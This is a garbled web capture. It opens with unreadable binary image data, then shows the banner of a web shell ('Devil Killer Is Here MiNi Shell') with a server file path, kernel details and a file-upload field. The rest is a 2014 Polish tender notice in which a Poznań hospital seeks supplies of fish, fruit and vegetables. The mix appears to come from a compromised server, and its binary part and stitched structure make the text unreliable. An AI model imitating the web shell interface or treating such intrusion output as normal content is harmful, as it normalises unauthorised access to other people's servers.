JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140429/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140429/92575-N-2014.html

<p class="kh_header"><b>Poznań: Dostawa artykułów spożywczych - ryb, przetworów owocowo-warzywnych, warzyw, ziemniaków i owoców</b><br>
<b>Numer ogłoszenia: 92575 - 2014; data zamieszczenia: 29.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych - ryb, przetworów owocowo-warzywnych, warzyw, ziemniaków i owoców.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.     Przedmiot  zamówienia:
Dostawa artykułów spożywczych - ryb, przetworów owocowo-warzywnych, warzyw, ziemniaków i owoców w podziale na części:
Część nr 1: Ryby i przetwory rybne
Część nr 2: Przetwory owocowo-warzywne
Część nr 3: Warzywa krajowe
Część nr 4: Ziemniaki
Część nr 5: Owoce południowe
Część nr 6: Owoce krajowe
Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 1 do specyfikacji stanowiący integralną jej część.
2.	Warunki realizacji zamówienia:
2.1	Dla Części nr 1:
2.1.1 Jakość ryb i przetworów rybnych nie może budzić zastrzeżeń.
2.1.2 Wykonawca zobowiązany jest do dostarczania ryb i przetworów rybnych w opakowaniach nieuszkodzonych, umożliwiających ich identyfikację, tzn. opakowanie powinno określać: nazwę artykułu spożywczego, nazwę producenta, termin przydatności do spożycia oraz wielkość opakowania.
2.1.3 Wykonawca zobowiązany jest do realizowania dostaw na podstawie pisemnego zamówienia złożonego faksem/drogą elektroniczną lub telefonicznie potwierdzonego pisemnie.
2.1.4 Wykonawca zobowiązany jest do dostarczenia ryb i przetworów rybnych do Kuchni Szpitalnej 1 raz w tygodniu w terminie 2 dni od momentu złożenia zamówienia na zasadach określonych w pkt. 2.1.3.
2.1.5 Wykonawca zobowiązany jest do dostarczenia ryb i przetworów rybnych na swój koszt, odpowiednim środkiem transportu w opakowaniach gwarantujących bezpieczny transport i magazynowanie.
2.2	Dla Części nr 2:
2.2.1   Jakość przetworów owocowo - warzywnych nie może budzić zastrzeżeń.
2.2.2 Wykonawca zobowiązany jest do dostarczania przetworów owocowo - warzywnych w opakowaniach nieuszkodzonych, umożliwiających ich identyfikację, tzn. opakowanie powinno określać: nazwę artykułu spożywczego, nazwę producenta, termin przydatności do spożycia oraz wielkość opakowania.
2.2.3 Wykonawca zobowiązany jest do dostarczania przetworów owocowo - warzywnych identycznych z zaproponowanymi w ofercie.
2.2.4 Wykonawca zobowiązany jest do realizowania dostaw na podstawie pisemnego zamówienia złożonego faksem/drogą elektroniczną lub telefonicznie potwierdzonego pisemnie.
2.2.5  Wykonawca zobowiązany jest do dostarczenia przetworów owocowo - warzywnych do Kuchni Szpitalnej 2 razy w miesiącu w terminie 2 dni od momentu złożenia zamówienia na zasadach określonych w pkt. 2.2.4.
2.2.6 Wykonawca zobowiązany jest do dostarczenia przetworów owocowo - warzywnych na swój koszt, odpowiednim środkiem transportu w opakowaniach gwarantujących bezpieczny transport i magazynowanie.
2.2.7 Zamawiający na podstawie art. 29 ust. 3 ustawy - Prawo zamówień publicznych  dopuszcza możliwość złożenia ofert równoważnych. Za produkt równoważny Zamawiający uzna produkt o takich samych lub bardzo zbliżonych walorach smakowych, zapachowych i kolorystycznych, składzie surowcowym, sposobie użycia i terminie przydatności do spożycia.
2.2.8 Zgodnie z art. 30 ust. 5 ustawy - Prawo zamówień publicznych ciężar udowodnienia, że oferowany przedmiot zamówienia jest równoważny w stosunku do wymagań określonych  przez Zamawiającego w specyfikacji spoczywa na Wykonawcy.
2.3	Dla Części nr 3:
2.3.1  Warzywa muszą być świeże, dobrej jakości, bez oznak zwiędnięcia i zapleśnienia.
2.3.2 Wykonawca zobowiązany jest do umieszczenia na opakowaniach warzyw etykiet umożliwiających ich identyfikację.
2.3.3 Wykonawca zobowiązany jest do realizowania dostaw na podstawie pisemnego zamówienia złożonego faksem/drogą elektroniczną lub telefonicznego potwierdzonego pisemnie.
2.3.4 Wykonawca zobowiązany jest do dostarczenia warzyw do Kuchni Szpitalnej 2 razy w tygodniu w terminie 2 dni od momentu złożenia zamówienia na zasadach określonych w pkt. 2.3.3.
2.3.5 Wykonawca zobowiązany jest do dostarczenia warzyw na swój koszt, odpowiednim środkiem transportu w opakowaniach gwarantujących bezpieczny transport i magazynowanie.    
2.4	Dla Części nr 4:
2.4.1  Ziemniaki muszą być świeże, dobrej jakości, bez oznak zwiędnięcia i zapleśnienia.
2.4.2 Wykonawca zobowiązany jest do umieszczenia na opakowaniach ziemniaków etykiet umożliwiających ich identyfikację.
2.4.3 Wykonawca zobowiązany jest do realizowania dostaw na podstawie pisemnego zamówienia złożonego faksem/drogą elektroniczną lub telefonicznego potwierdzonego pisemnie.
2.4.4  Wykonawca zobowiązany jest do dostarczenia ziemniaków do Kuchni Szpitalnej 2 razy w tygodniu w terminie 2 dni od momentu złożenia zamówienia na zasadach określonych w pkt. 2.4.3. 
2.4.5  Wykonawca zobowiązany jest do dostarczania ziemniaków identycznych z zaproponowanymi w ofercie.
2.4.6  Wykonawca zobowiązany jest do dostarczania ziemniaków w miarę jednolitej wielkości.
2.4.7  Użyte przez Zamawiającego w treści specyfikacji znaki towarowe, patenty lub elementy wskazujące na miejsce pochodzenia produktu mają charakter przykładowy, a Wykonawca ma możliwość zastosowania w tym przypadku rozwiązań równoważnych.
2.4.8  Zamawiający na podstawie art. 29 ust. 3 ustawy - Prawo zamówień publicznych dopuszcza możliwość złożenia ofert równoważnych pod warunkiem, że oferowany asortyment będzie o takich samych lub lepszych parametrach jakościowych.
2.4.9  Zgodnie z art. 30 ust. 5 ustawy - Prawo zamówień publicznych ciężar udowodnienia, że oferowany przedmiot zamówienia jest równoważny w stosunku do wymagań określonych  przez Zamawiającego w specyfikacji spoczywa na Wykonawcy.
2.5 Dla Części nr 5:
2.5.1 Owoce muszą być świeże, kształtne, soczyste, co najmniej klasy I i w miarę jednolitej wielkości. Muszą dobrze smakować i zdrowo wyglądać.
2.5.2 Wykonawca zobowiązany jest do umieszczenia na opakowaniach owoców etykiet umożliwiających ich identyfikację.
2.5.3 Wykonawca zobowiązany jest do realizowania dostaw na podstawie pisemnego zamówienia złożonego faksem/drogą elektroniczną lub telefonicznego potwierdzonego pisemnie.
2.5.4 Wykonawca zobowiązany jest do dostarczenia owoców do siedziby Zamawiającego 2 razy w tygodniu w terminie 2 dni od momentu złożenia zamówienia na zasadach określonych w pkt. 2.5.3.
2.6 Dla Części nr 6:
2.6.1 Owoce muszą być świeże, kształtne, soczyste, co najmniej klasy I i w miarę jednolitej wielkości. Muszą dobrze smakować i zdrowo wyglądać. Muszą być pozbawione wszelkich chorób, np. plamistości podskórnej.  
2.6.2 Wykonawca zobowiązany jest do umieszczenia na opakowaniach owoców etykiet umożliwiających ich identyfikację.
2.6.3 Wykonawca zobowiązany jest do realizowania dostaw na podstawie pisemnego zamówienia złożonego faksem/drogą elektroniczną lub telefonicznego potwierdzonego pisemnie.
2.6.4 Wykonawca zobowiązany jest do dostarczenia owoców do siedziby Zamawiającego 2 razy w tygodniu w terminie 2 dni od momentu złożenia zamówienia na zasadach określonych w pkt. 2.6.3.
2.7  W szczególnych przypadkach Zamawiający zastrzega sobie prawo do żądania dostaw w trybie awaryjnym, tzn. w terminie skróconym do 1 dnia od momentu pisemnego zamówienia złożonego faksem/drogą elektroniczną lub telefonicznego potwierdzonego pisemnie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.24.30.00-3, 03.31.10.00-2, 15.33.00.00-0, 03.22.10.00-6, 03.21.21.00-1, 03.22.21.10-7, 03.22.23.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia  wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie złożonego oświadczenia, o którym mowa w rozdz. VI, pkt 1.1 specyfikacji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie złożonego oświadczenia, o którym mowa w rozdz. VI, pkt 1.1 specyfikacji</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie złożonego oświadczenia, o którym mowa w rozdz. VI, pkt 1.1 specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie złożonego oświadczenia, o którym mowa w rozdz. VI, pkt 1.1 specyfikacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku na podstawie złożonego oświadczenia, o którym mowa w rozdz. VI, pkt 1.1 specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający  wymaga  przedstawienia  wraz  z  ofertą w szczególności:
1. dla Części nr 1 
-	aktualnej decyzji administracyjnej potwierdzającej spełnianie wymagań zdrowotnych żywności i procedur niezbędnych dla zapewnienia bezpieczeństwa żywności i żywienia, w tym dotyczących przestrzegania zasad higieny żywności oraz materiałów i wyrobów przeznaczonych do kontaktu z żywnością, określonych w ustawie z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia  (Dz. U. z 2010r. Nr 136 poz. 914 z późń. zm),
-	oświadczenia Wykonawcy, iż do każdej dostawy oferowanych artykułów spożywczych zostanie dołączony HANDLOWY DOKUMENT IDENTYFIKACYJNY według Załącznika nr 7 do specyfikacji,
-	oświadczenia Wykonawcy, że oferowane produkty są zgodne z aktualnie obowiązującymi dla tego rodzaju produktów normami oraz wytycznymi GMP (Dobra praktyka produkcyjna), GHP (Dobra praktyka higieniczna) i HACCP (System zarządzania bezpieczeństwem zdrowotnym żywności) według Załącznika nr 8 do specyfikacji,
-	oświadczenia Wykonawcy, że transport oferowanych artykułów spożywczych odpowiada wymaganiom sanitarnym dotyczącym środków transportu żywności określonych przepisami ustawy  z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r., nr 136, poz. 914) oraz Rozporządzeniu Ministra Zdrowia z dnia 19 grudnia 2002 roku w sprawie wymagań sanitarnych dotyczących transportu żywności (Dz. U. z 2003 roku, nr 21, poz. 179) według Załącznika nr 9 do specyfikacji.
2. dla Części nr 2, Części nr 3, Części nr 4, Części nr 5 i Części nr 6:
-	oświadczenia Wykonawcy, że transport oferowanych artykułów spożywczych odpowiada wymaganiom sanitarnym dotyczącym środków transportu żywności określonych przepisami ustawy  z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r., nr 136, poz. 914) oraz Rozporządzeniu Ministra Zdrowia z dnia 19 grudnia 2002 roku w sprawie wymagań sanitarnych dotyczących transportu żywności (Dz. U. z 2003 roku, nr 21, poz. 179) według Załącznika nr 9 do specyfikacji.
Oferta wspólna / konsorcjum
1.	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez  dwóch lub więcej Wykonawców, w ofercie musi zostać złożone  oświadczenie z art. 22  ust. 1 ustawy i podpisane przez tych Wykonawców,  którzy spełniają postawione warunki.
2.	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców, w ofercie  muszą być złożone oświadczenia z art. 24 ust. 1 ustawy  przez każdego z Wykonawców  składających ofertę wspólną lub jedno, podpisane przez wszystkich Wykonawców składających taką ofertę.
3.	Dokumentami potwierdzającymi spełnianie warunków udziału z art. 22 ust. 1 ustawy są: dokumenty złożone przez co najmniej jednego z Wykonawców wspólnie ubiegających  się o udzielenie zamówienia lub dokumenty złożone przez tych Wykonawców, z których wynikać będzie łączne ich  spełnianie.
4.	Dokumenty potwierdzające brak podstaw do wykluczenia z postępowania Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy przedkłada w ofercie każdy z Wykonawców Konsorcjum.
5.	Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu, albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego  (do oferty dołączyć odpowiednie pełnomocnictwo). 
6.	Pełnomocnictwo może być udzielone w szczególności:
	-  łącznie przez wszystkich Wykonawców (jeden dokument)
	- oddzielnie przez każdego z nich (tyle dokumentów ilu Wykonawców)
7.	Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. 
8.	Wykonawcy wspólnie ubiegający się  o zamówienie, których oferta zostanie uznana za  najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani  przedstawić Zamawiającemu umowę regulującą współpracę tych podmiotów zawierającą następujące postanowienia:
a.	określenie celu  gospodarczego,
b.	określenie, który z podmiotów jest upoważniony do występowania w imieniu pozostałych przy realizacji zamówienia,
c.	oznaczenie czasu trwania obejmującego okres realizacji przedmiotu zamówienia,
d.	zakaz zmian w umowie bez zgody Zamawiającego.
Nie dopuszcza się składania umowy przedwstępnej lub umowy zawartej pod warunkiem zawieszającym.
Podwykonawcy 
1. Definicja umowy o podwykonawstwo zgodnie z art. 2  pkt. 9a ustawy -Pzp
Umowa o podwykonawstwo - umowa  w formie pisemnej o charakterze odpłatnym, której przedmiotem są usługi, dostawy lub roboty budowlane stanowiące część zamówienia publicznego, zawarta między wybranym przez zamawiającego wykonawcą  a innym podmiotem (podwykonawcą), a w przypadku zamówień publicznych na roboty budowlane także między podwykonawcą a dalszym podwykonawcą lub między dalszymi podwykonawcami.
2.	Wykonawca może  powierzyć wykonanie części zamówienia podwykonawcy.
3.	Zamawiający żąda  wskazania  przez Wykonawcę w Załączniku nr 2 do SIWZ (Formularz Oferty)  części zamówienia, której wykonanie zamierza powierzyć podwykonawcy oraz podania przez Wykonawcę nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art.  22 ust. 1.
4.	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
5.	Za prace zrealizowane  przez Podwykonawców Wykonawca będzie odpowiadał jak za własne.
OPIS SPOSOBU PRZYGOTOWANIA OFERT
1.	Wymagania  ogólne
1.1	Wykonawca  może  złożyć tylko  jedną  kompletną  ofertę.
1.2	Oferta  musi  być  złożona  w  formie  pisemnej,  zgodnie  z  wymaganiami  opisanymi  w   niniejszej  specyfikacji.
1.3	Oferta winna  być  sporządzona  w  języku  polskim,  na  maszynie  do  pisania,  komputerze lub  inną  trwałą,  czytelną  techniką.  Złożone  materiały  powinny  być  spięte,  wszystkie  strony  oferty  zawierające  jakąkolwiek  treść  winny  być  ponumerowane,  podpisane  przez  upoważnionego  przedstawiciela  Wykonawcy  i  opatrzone  pieczątką.  
Strony puste nie wymagają  numeracji,  podpisów  i  pieczątek.  Ewentualne  poprawki  w  tekście oferty  muszą  być  naniesione  w  czytelny  sposób,  parafowane  i  datowane  własnoręcznie  przez  osobę  podpisującą  ofertę.
1.4	Dokumenty sporządzone w języku obcym należy złożyć  wraz  z  tłumaczeniem  na  język  polski.
2.	Zawartość  oferty  i  sposób  jej  przedstawienia
2.1	Ofertę stanowi wypełniony formularz FORMULARZ OFERTY, załącznik nr 2  do specyfikacji oraz niżej wymienione dokumenty:
a)    formularz specyfikacji cenowej: załącznik nr 1 do specyfikacji		
2.2	Wraz z ofertą  należy złożyć:
a)	Oświadczenia i dokumenty  wskazane   w  rozdziale VI  specyfikacji,
b)	Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.
c)	Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której wynikać będzie przedmiotowe pełnomocnictwo (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza). Pełnomocnik  może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.
2.3	Oferta  wraz  z  załącznikami  musi  być  podpisana  przez  osobę  upoważnioną  do  reprezentowania  Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy.
3.	Opakowanie  oferty
3.1	Wykonawca  umieszcza  ofertę  w  nieprzejrzystym,  zamkniętym  opakowaniu,  które;
a)	będzie  zaadresowane  na  Zamawiającego,
b)	będzie posiadać  oznaczenia: Oferta na dostawę artykułów spożywczych - ryb, przetworów owocowo - warzywnych, warzyw, ziemniaków i owoców. Otwierają osoby wyznaczone do wykonania czynności w postępowaniu dnia 12.05.2014r. o godz. 09:30.
3.2	W przypadku załączenia do oferty dokumentów, których Zamawiający nie żąda zalecane jest ich oddzielenie od oferty i oznaczenie napisem DOKUMENTY UZUPEŁNIAJĄCE. 
4.	Tajemnica przedsiębiorstwa
4.1	Zamawiający  informuje,  iż  zgodnie  z  art. 8  w  zw.  z  art.  96  ust. 3  ustawy oferty  składane  w  postępowaniu  o zamówienie  publiczne  są  jawne  i  podlegają  udostępnieniu  od  chwili  ich  otwarcia, z wyjątkiem  informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeśli Wykonawca, zastrzegł, że nie mogą one być udostępniane.
4.2	Zamawiający zaleca, aby informacje zastrzeżone, jako tajemnica przedsiębiorstwa były przez Wykonawcę złożone w oddzielnej wewnętrznej kopercie z oznakowaniem TAJEMNICA PRZEDSIĘBIORSTWA, lub spięte oddzielnie od pozostałych, jawnych elementów oferty. W razie  braku takiego wskazania, Zamawiający uzna,  że wszelkie oświadczenia i zaświadczenia składane w trakcie postępowania są jawne bez zastrzeżeń.
4.3	Zastrzeżenie informacji, które nie stanowią tajemnicy przedsiębiorstwa w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji będzie traktowane jako bezskuteczne i skutkować będzie ich odtajnieniem.
5.	Zmiana  lub  wycofanie  oferty
5.1	Wykonawca  może  wprowadzić  zmiany, poprawki, modyfikacje i uzupełnienia do złożonej oferty pod  warunkiem,  że  Zamawiający otrzyma pisemne zawiadomienie o wprowadzeniu zmian przed  terminem  składania ofert. Powiadomienie o wprowadzeniu zmian musi być złożone  wg  takich samych zasad, jak składana oferta tj. w kopercie odpowiednio oznakowanej napisem ZMIANA. Koperty oznaczone ZMIANA zostaną otwarte przy otwieraniu oferty Wykonawcy, który wprowadził zmiany i po stwierdzeniu poprawności procedury dokonywania zmian, zostaną dołączone do oferty.
